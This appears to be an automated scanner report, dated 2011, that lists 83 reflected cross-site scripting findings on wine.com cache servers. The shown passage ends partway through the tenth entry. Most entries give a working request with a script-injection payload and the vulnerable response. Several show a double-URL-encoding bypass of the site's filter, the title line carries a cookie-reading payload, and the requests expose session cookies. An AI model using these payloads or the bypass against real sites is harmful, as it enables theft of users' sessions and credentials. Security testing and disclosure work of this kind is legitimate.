XSS, DORK, Daily Report, favincon.ico, Cross Site Scripting, CWE-79, CAPEC-86

http://cache.wine.com/favicon.icod1219%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e0ca90fa5de6

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 11:20:15 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://cache.wine.com/ScriptResource.axd [REST URL parameter 1]

1.2. http://cache.wine.com/WebResource.axd [Lo0P parameter]

1.3. http://cache.wine.com/WebResource.axd [REST URL parameter 1]

1.4. http://cache.wine.com/favicon.ico [REST URL parameter 1]

1.5. http://cache.wine.com/images/DiscoveryTourWineclub.jpg [Lo0P parameter]

1.6. http://cache.wine.com/images/btnAddToCart.png [Lo0P parameter]

1.7. http://cache.wine.com/images/btnSubmit.png [Lo0P parameter]

1.8. http://cache.wine.com/images/btn_continue.gif [Lo0P parameter]

1.9. http://cache.wine.com/images/clear.gif [Lo0P parameter]

1.10. http://cache.wine.com/images/css/HomeNavRtArrow.jpg [Lo0P parameter]

1.11. http://cache.wine.com/images/css/facebookIcon.png [Lo0P parameter]

1.12. http://cache.wine.com/images/css/greyPlus.gif [Lo0P parameter]

1.13. http://cache.wine.com/images/css/iconWineMan.png [Lo0P parameter]

1.14. http://cache.wine.com/images/glo_icon_bubbly_big.gif [Lo0P parameter]

1.15. http://cache.wine.com/images/glo_icon_collectable_big.gif [Lo0P parameter]

1.16. http://cache.wine.com/images/glo_icon_gift_big.gif [Lo0P parameter]

1.17. http://cache.wine.com/images/glo_icon_kosher_big.gif [Lo0P parameter]

1.18. http://cache.wine.com/images/glo_icon_red_big.gif [Lo0P parameter]

1.19. http://cache.wine.com/images/glo_icon_rose_big.gif [Lo0P parameter]

1.20. http://cache.wine.com/images/glo_icon_video_big.gif [Lo0P parameter]

1.21. http://cache.wine.com/images/glo_icon_white_big.gif [Lo0P parameter]

1.22. http://cache.wine.com/images/rating90.gif [Lo0P parameter]

1.23. http://cache.wine.com/images/rating91.gif [Lo0P parameter]

1.24. http://cache.wine.com/images/rating94.gif [Lo0P parameter]

1.25. http://cache.wine.com/images/ratingBH.gif [Lo0P parameter]

1.26. http://cache.wine.com/images/ratingCG.gif [Lo0P parameter]

1.27. http://cache.wine.com/images/ratingJH.gif [Lo0P parameter]

1.28. http://cache.wine.com/images/ratingRP.gif [Lo0P parameter]

1.29. http://cache.wine.com/images/ratingWE.gif [Lo0P parameter]

1.30. http://cache.wine.com/images/ratingWN.gif [Lo0P parameter]

1.31. http://cache.wine.com/images/ratingWP.gif [Lo0P parameter]

1.32. http://cache.wine.com/images/tn_img_bg_fade.gif [Lo0P parameter]

1.33. http://cache.wine.com/images/topnav/imgGlobalHeaderRightBadge.gif [Lo0P parameter]

1.34. http://cache.wine.com/images/topnav/imgGlobalHeaderWineGuyLogo.gif [Lo0P parameter]

1.35. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 1]

1.36. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 2]

1.37. http://cache.wine.com/includes/css/defaultsixC.css [REST URL parameter 3]

1.38. http://cache.wine.com/labels/102688m.jpg [Lo0P parameter]

1.39. http://cache.wine.com/labels/103040m.jpg [Lo0P parameter]

1.40. http://cache.wine.com/labels/106551m.jpg [Lo0P parameter]

1.41. http://cache.wine.com/labels/107565m.jpg [Lo0P parameter]

1.42. http://cache.wine.com/labels/108103m.jpg [Lo0P parameter]

1.43. http://cache.wine.com/labels/108138m.jpg [Lo0P parameter]

1.44. http://cache1.wine.com/ScriptResource.axd [REST URL parameter 1]

1.45. http://cache1.wine.com/WebResource.axd [REST URL parameter 1]

1.46. http://cache1.wine.com/favicon.ico [REST URL parameter 1]

1.47. http://cache1.wine.com/images/90PointRatedWineClub.jpg [Lo0P parameter]

1.48. http://cache1.wine.com/images/WorldWineClub.jpg [Lo0P parameter]

1.49. http://cache1.wine.com/images/btnSearch.gif [Lo0P parameter]

1.50. http://cache1.wine.com/images/css/homeNavBot.gif [Lo0P parameter]

1.51. http://cache1.wine.com/images/css/homeNavBotDark.gif [Lo0P parameter]

1.52. http://cache1.wine.com/images/css/homeNavRtArrow.jpg [Lo0P parameter]

1.53. http://cache1.wine.com/images/css/homeNavTop.gif [Lo0P parameter]

1.54. http://cache1.wine.com/images/css/homeNavTopDark.gif [Lo0P parameter]

1.55. http://cache1.wine.com/images/css/twiiterIcon.png [Lo0P parameter]

1.56. http://cache1.wine.com/images/glo_icon_boutique_big.gif [Lo0P parameter]

1.57. http://cache1.wine.com/images/glo_icon_organic_big.gif [Lo0P parameter]

1.58. http://cache1.wine.com/images/glo_icon_screwcap_big.gif [Lo0P parameter]

1.59. http://cache1.wine.com/images/glo_tn_top_corners_two.gif [Lo0P parameter]

1.60. http://cache1.wine.com/images/gradiantBg.png [Lo0P parameter]

1.61. http://cache1.wine.com/images/homepage/372x105_ipad.jpg [Lo0P parameter]

1.62. http://cache1.wine.com/images/homepage/372x105_stewardship.jpg [Lo0P parameter]

1.63. http://cache1.wine.com/images/homepage/bgkFooter.gif [Lo0P parameter]

1.64. http://cache1.wine.com/images/homepage/bgkSignUpBorder.gif [Lo0P parameter]

1.65. http://cache1.wine.com/images/homepage/btnSignUp.gif [Lo0P parameter]

1.66. http://cache1.wine.com/images/homepage/btnStartShopping.gif [Lo0P parameter]

1.67. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_10shipping.jpg [Lo0P parameter]

1.68. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg [Lo0P parameter]

1.69. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg [Lo0P parameter]

1.70. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg [Lo0P parameter]

1.71. http://cache1.wine.com/images/icnCloseWindow.gif [Lo0P parameter]

1.72. http://cache1.wine.com/images/icon_email.gif [Lo0P parameter]

1.73. http://cache1.wine.com/images/imgCart.gif [Lo0P parameter]

1.74. http://cache1.wine.com/images/logos/wineManLine.gif [Lo0P parameter]

1.75. http://cache1.wine.com/images/rating96.gif [Lo0P parameter]

1.76. http://cache1.wine.com/images/ratingPR.gif [Lo0P parameter]

1.77. http://cache1.wine.com/images/ratingST.gif [Lo0P parameter]

1.78. http://cache1.wine.com/images/ratingWS.gif [Lo0P parameter]

1.79. http://cache1.wine.com/images/stewardship/stewardship_guy_small.gif [Lo0P parameter]

1.80. http://cache1.wine.com/includes/css/defaultsixC.css [Lo0P parameter]

1.81. http://cache1.wine.com/labels/102367m.jpg [Lo0P parameter]

1.82. http://cache1.wine.com/labels/105835m.jpg [Lo0P parameter]

1.83. http://cache1.wine.com/labels/108120m.jpg [Lo0P parameter]



1. Cross-site scripting (reflected)
There are 83 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://cache.wine.com/ScriptResource.axd [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f612%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e890c46504 was submitted in the REST URL parameter 1. This input was echoed as 1f612"><script>alert(1)</script>7e890c46504 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ScriptResource.axd1f612%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7e890c46504?d=CLw-uActKiwZsy7qP6LIK_i361lkcCysBFdEalT0CZQVEp45H8y0j-gbB1Pb1ejqIJI-rwVWNPV0-XE7U6NZvox7hyZEx0Sl9yA3JsiO8xg1&t=16ab2387 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:18:02 GMT; path=/
Set-Cookie: SessionGUID=1e3937c8%2Da88b%2D4060%2Da1bc%2D35f684a9037c; expires=Tue, 14-Feb-2012 17:18:02 GMT; domain=cache.wine.com; path=/
Content-Length: 33601


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/ScriptResource.axd1f612"><script>alert(1)</script>7e890c46504?d" value="CLw%2DuActKiwZsy7qP6LIK%5Fi361lkcCysBFdEalT0CZQVEp45H8y0j%2DgbB1Pb1ejqIJI%2DrwVWNPV0%2DXE7U6NZvox7hyZEx0Sl9yA3JsiO8xg1" />
...[SNIP]...

1.2. http://cache.wine.com/WebResource.axd [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /WebResource.axd

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b7166<script>alert(1)</script>ed589c53d0e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebResource.axd?d=kn_xm01GAKIeMJbj40MimA2&t=634118940962881628&Lo0P=b7166<script>alert(1)</script>ed589c53d0e HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 298
Date: Sun, 13 Feb 2011 13:56:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /WebResource.axd?d=kn_xm01GAKIeMJbj40MimA2&t=634118940962881628&Lo0P=b7166<script>alert(1)</script>ed589c53d0e was not found on this server.<P>
...[SNIP]...

1.3. http://cache.wine.com/WebResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7017%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6530925c923 was submitted in the REST URL parameter 1. This input was echoed as d7017"><script>alert(1)</script>6530925c923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /WebResource.axdd7017%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6530925c923?d=qMvLqAYYlQKxs7VjG11tzg2&t=634110324544165077 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; ASPSESSIONIDCAADTCTT=FOPHBBLAKOBMIJIECKNIKPBL; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=141878944.2078173882.1297703931.1297703931.1297703931.1; __utmb=141878944; __utmc=141878944; __utmz=141878944.1297703931.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/59|utmcmd=referral; SessionGUID=1e3937c8-a88b-4060-a1bc-35f684a9037c; ASP.NET_SessionId=v3dtb3mmqbubajeqx4v01odl; warehouse=CA; cSource=error_404; SL_UVId=2B1D3888066794EE

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Mon, 14 Feb 2011 17:18:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cSource=error%5F404; expires=Mon, 14-Feb-2011 19:18:00 GMT; path=/
Set-Cookie: SessionGUID=1e3937c8%2Da88b%2D4060%2Da1bc%2D35f684a9037c; expires=Tue, 14-Feb-2012 17:18:00 GMT; domain=cache.wine.com; path=/
Content-Length: 33513


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/WebResource.axdd7017"><script>alert(1)</script>6530925c923?d" value="qMvLqAYYlQKxs7VjG11tzg2" />
...[SNIP]...

1.4. http://cache.wine.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43239%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e29ad3f559a5 was submitted in the REST URL parameter 1. This input was echoed as 43239"><script>alert(1)</script>29ad3f559a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico43239%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e29ad3f559a5 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Sun, 13 Feb 2011 15:00:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SessionGUID=8527281D%2D77B5%2D4A14%2DAA5A%2D3081A2436700; expires=Mon, 13-Feb-2012 15:00:08 GMT; domain=cache.wine.com; path=/
Set-Cookie: ASPSESSIONIDQCDCRBQQ=PKIDHIPDOOHFFOKHNLDNPEKK; path=/
Content-Length: 33265


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://cache.wine.com:80/favicon.ico43239"><script>alert(1)</script>29ad3f559a5" value="" />
...[SNIP]...

1.5. http://cache.wine.com/images/DiscoveryTourWineclub.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/DiscoveryTourWineclub.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 95ed3<script>alert(1)</script>5c02f3e89cb was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/DiscoveryTourWineclub.jpg?Lo0P=95ed3<script>alert(1)</script>5c02f3e89cb HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/DiscoveryTourWineclub.jpg?Lo0P=95ed3<script>alert(1)</script>5c02f3e89cb was not found on this server.<P>
...[SNIP]...

1.6. http://cache.wine.com/images/btnAddToCart.png [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/btnAddToCart.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 3afa1<script>alert(1)</script>31c929450d5 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btnAddToCart.png?Lo0P=3afa1<script>alert(1)</script>31c929450d5 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 259
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btnAddToCart.png?Lo0P=3afa1<script>alert(1)</script>31c929450d5 was not found on this server.<P>
...[SNIP]...

1.7. http://cache.wine.com/images/btnSubmit.png [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/btnSubmit.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload b975b<script>alert(1)</script>c8a0f7e12e3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btnSubmit.png?Lo0P=b975b<script>alert(1)</script>c8a0f7e12e3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmb=32446520.1.10.1297605361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 256
Date: Sun, 13 Feb 2011 13:56:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btnSubmit.png?Lo0P=b975b<script>alert(1)</script>c8a0f7e12e3 was not found on this server.<P>
...[SNIP]...

1.8. http://cache.wine.com/images/btn_continue.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/btn_continue.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload fb2ee<script>alert(1)</script>10c7f841393 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/btn_continue.gif?Lo0P=fb2ee<script>alert(1)</script>10c7f841393 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 259
Date: Mon, 14 Feb 2011 17:16:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/btn_continue.gif?Lo0P=fb2ee<script>alert(1)</script>10c7f841393 was not found on this server.<P>
...[SNIP]...

1.9. http://cache.wine.com/images/clear.gif [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/clear.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload cd698<script>alert(1)</script>8587fb1d6d3 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/clear.gif?Lo0P=cd698<script>alert(1)</script>8587fb1d6d3 HTTP/1.1
Host: cache.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 252
Date: Mon, 14 Feb 2011 17:16:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/clear.gif?Lo0P=cd698<script>alert(1)</script>8587fb1d6d3 was not found on this server.<P>
...[SNIP]...

1.10. http://cache.wine.com/images/css/HomeNavRtArrow.jpg [Lo0P parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.wine.com
Path:   /images/css/HomeNavRtArrow.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload aced8<script>alert(1)</script>ddba18ef896 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

